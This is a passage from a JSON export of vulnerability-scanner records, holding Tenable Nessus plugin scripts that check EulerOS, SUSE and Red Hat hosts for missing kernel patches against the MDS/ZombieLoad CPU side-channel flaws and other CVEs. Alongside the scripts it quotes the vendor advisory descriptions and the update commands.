(CVE-2018-12126)\n\n - Microprocessors use a 'load port' subcomponent to\n perform load operations from memory or IO. During a\n load operation, the load port receives data from the\n memory or IO subsystem and then provides the data to\n the CPU registers and operations in the CPU's\n pipelines. Stale load operations results are stored in\n the 'load port' table until overwritten by newer\n operations. Certain load-port operations triggered by\n an attacker can be used to reveal data about previous\n stale requests leaking data back to the attacker via a\n timing side-channel. (CVE-2018-12127)\n\n - Uncacheable memory on some microprocessors utilizing\n speculative execution may allow an authenticated user\n to potentially enable information disclosure via a side\n channel with local access. (CVE-2019-11091)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1588\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e446bff5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-debuginfo-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-debuginfo-common-x86_64-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-devel-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-headers-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-tools-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-tools-libs-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"perf-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"python-perf-3.10.0-862.14.0.1.h178.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:25:38", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes.\n\nFour new speculative execution information leak issues have been\nidentified in Intel CPUs. (bsc#1111331)\n\nCVE-2018-12126: Microarchitectural Store Buffer Data Sampling (MSBDS)\n\nCVE-2018-12127: Microarchitectural Fill Buffer Data Sampling (MFBDS)\n\nCVE-2018-12130: Microarchitectural Load Port Data Samling (MLPDS)\n\nCVE-2019-11091: Microarchitectural Data Sampling Uncacheable Memory\n(MDSUM)\n\nThis kernel update contains software mitigations for these issues,\nwhich also utilize CPU microcode updates shipped in parallel.\n\nFor more information on this set of information leaks, check out\nhttps://www.suse.com/support/kb/doc/?id=7023736\n\nThe following security bugs were fixed: CVE-2018-1128: It was found\nthat cephx authentication protocol did not verify ceph clients\ncorrectly and was vulnerable to replay attack. Any attacker having\naccess to ceph cluster network who is able to sniff packets on network\ncould use this vulnerability to authenticate with ceph service and\nperform actions allowed by ceph service. (bnc#1096748).\n\nCVE-2018-1129: A flaw was found in the way signature calculation was\nhandled by cephx authentication protocol. An attacker having access to\nceph cluster network who is able to alter the message payload was able\nto bypass signature checks done by cephx protocol. (bnc#1096748).\n\nCVE-2016-8636: Integer overflow in the mem_check_range function in\ndrivers/infiniband/sw/rxe/rxe_mr.c allowed local users to cause a\ndenial of service (memory corruption), obtain sensitive information or\npossibly have unspecified other impact via a write or read request\ninvolving the ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2019-1287-1.NASL", "href": "https://www.tenable.com/plugins/nessus/125282", "published": "2019-05-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2019:1287-1) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:1287-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125282);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/10 13:51:51\");\n\n script_cve_id(\"CVE-2016-8636\", \"CVE-2017-17741\", \"CVE-2017-18174\", \"CVE-2018-1091\", \"CVE-2018-1120\", \"CVE-2018-1128\", \"CVE-2018-1129\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-19407\", \"CVE-2019-11091\", \"CVE-2019-11486\", \"CVE-2019-3882\", \"CVE-2019-8564\", \"CVE-2019-9503\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2019:1287-1) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes.\n\nFour new speculative execution information leak issues have been\nidentified in Intel CPUs. (bsc#1111331)\n\nCVE-2018-12126: Microarchitectural Store Buffer Data Sampling (MSBDS)\n\nCVE-2018-12127: Microarchitectural Fill Buffer Data Sampling (MFBDS)\n\nCVE-2018-12130: Microarchitectural Load Port Data Samling (MLPDS)\n\nCVE-2019-11091: Microarchitectural Data Sampling Uncacheable Memory\n(MDSUM)\n\nThis kernel update contains software mitigations for these issues,\nwhich also utilize CPU microcode updates shipped in parallel.\n\nFor more information on this set of information leaks, check out\nhttps://www.suse.com/support/kb/doc/?id=7023736\n\nThe following security bugs were fixed: CVE-2018-1128: It was found\nthat cephx authentication protocol did not verify ceph clients\ncorrectly and was vulnerable to replay attack. Any attacker having\naccess to ceph cluster network who is able to sniff packets on network\ncould use this vulnerability to authenticate with ceph service and\nperform actions allowed by ceph service. (bnc#1096748).\n\nCVE-2018-1129: A flaw was found in the way signature calculation was\nhandled by cephx authentication protocol. An attacker having access to\nceph cluster network who is able to alter the message payload was able\nto bypass signature checks done by cephx protocol. (bnc#1096748).\n\nCVE-2016-8636: Integer overflow in the mem_check_range function in\ndrivers/infiniband/sw/rxe/rxe_mr.c allowed local users to cause a\ndenial of service (memory corruption), obtain sensitive information or\npossibly have unspecified other impact via a write or read request\ninvolving the 'RDMA protocol over infiniband' (aka Soft RoCE)\ntechnology (bnc#1024908).\n\nCVE-2017-18174: In the amd_gpio_remove function in\ndrivers/pinctrl/pinctrl-amd.c calls the pinctrl_unregister function,\nleading to a double free (bnc#1080533).\n\nCVE-2018-1091: In the flush_tmregs_to_thread function in\narch/powerpc/kernel/ptrace.c, a guest kernel crash can be triggered\nfrom unprivileged userspace during a core dump on a POWER host due to\na missing processor feature check and an erroneous use of\ntransactional memory (TM) instructions in the core dump path, leading\nto a denial of service (bnc#1087231).\n\nCVE-2018-1120: By mmap()ing a FUSE-backed file onto a process's memory\ncontaining command line arguments (or environment strings), an\nattacker can cause utilities from psutils or procps (such as ps, w) or\nany other program which made a read() call to the /proc/<pid>/cmdline\n(or /proc/<pid>/environ) files to block indefinitely (denial of\nservice) or for some controlled time (as a synchronization primitive\nfor other attacks) (bnc#1093158). </pid></pid>\n\nCVE-2019-11486: The Siemens R3964 line discipline driver in\ndrivers/tty/n_r3964.c has multiple race conditions (bnc#1133188).\n\nCVE-2019-3882: A flaw was found in the vfio interface implementation\nthat permits violation of the user's locked memory limit. If a device\nis bound to a vfio driver, such as vfio-pci, and the local attacker is\nadministratively granted ownership of the device, it may cause a\nsystem memory exhaustion and thus a denial of service (DoS)\n(bsc#1131427).\n\nCVE-2018-19407: The vcpu_scan_ioapic function in arch/x86/kvm/x86.c\nallowed local users to cause a denial of service (NULL pointer\ndereference and BUG) via crafted system calls that reach a situation\nwhere ioapic is uninitialized (bnc#1116841).\n\nCVE-2017-17741: The KVM implementation allowed attackers to obtain\npotentially sensitive information from kernel memory, aka a write_mmio\nstack-based out-of-bounds read, related to arch/x86/kvm/x86.c and\ninclude/trace/events/kvm.h (bnc#1073311).\n\nCVE-2019-9503, CVE-2019-8564: Multiple brcmfmac frame validation\nbypasses have been fixed (bnc#1132828, bnc#1132673).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1068032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1073311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1093158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1094268\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1106913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1109772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1113399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1116841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1118338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1122822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1124832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1125580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1129279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1131416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1131427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1131587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1133188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8636/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-17741/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18174/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1091/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12126/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12130/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19407/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-11091/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-11486/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-3882/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8564/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-9503/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/support/kb/doc/?id=7023736\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20191287-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4a87e55\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-1287=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-1287=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-1287=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-1287=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2019-1287=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2019-1287=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-1287=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_109-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_121-92_109-default-1-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.121-92.109.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.121-92.109.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:27:00", "bulletinFamily": "scanner", "description": "An update for kernel-rt is now available for Red Hat Enterprise MRG 2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the ", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2019-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/125192", "published": "2019-05-16T00:00:00", "title": "RHEL 6 : MRG (RHSA-2019:1190) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:1190. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125192);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n script_xref(name:\"RHSA\", value:\"2019:1190\");\n script_xref(name:\"IAVA\", value:\"2019-A-0166\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2019:1190) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-rt is now available for Red Hat Enterprise MRG 2.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which\nenables fine-tuning for systems with extremely high determinism\nrequirements.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the 'fill buffer', a\nmechanism used by modern CPUs when a cache-miss is made on L1 CPU\ncache. If an attacker can generate a load operation that would create\na page fault, the execution will continue speculatively with incorrect\ndata from the fill buffer while the data is fetched from higher level\ncaches. This response time can be measured to infer data in the fill\nbuffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level\nmicro-optimizations to improve the performance of writing data back to\nCPU caches. The write operation is split into STA (STore Address) and\nSTD (STore Data) sub-operations. These sub-operations allow the\nprocessor to hand-off address generation logic into these\nsub-operations for optimized writes. Both of these sub-operations\nwrite to a shared distributed processor structure called the\n'processor store buffer'. As a result, an unprivileged attacker could\nuse this flaw to read private data resident within the CPU's processor\nstore buffer. (CVE-2018-12126)\n\n* Microprocessors use a 'load port' subcomponent to perform load\noperations from memory or IO. During a load operation, the load port\nreceives data from the memory or IO subsystem and then provides the\ndata to the CPU registers and operations in the CPU's 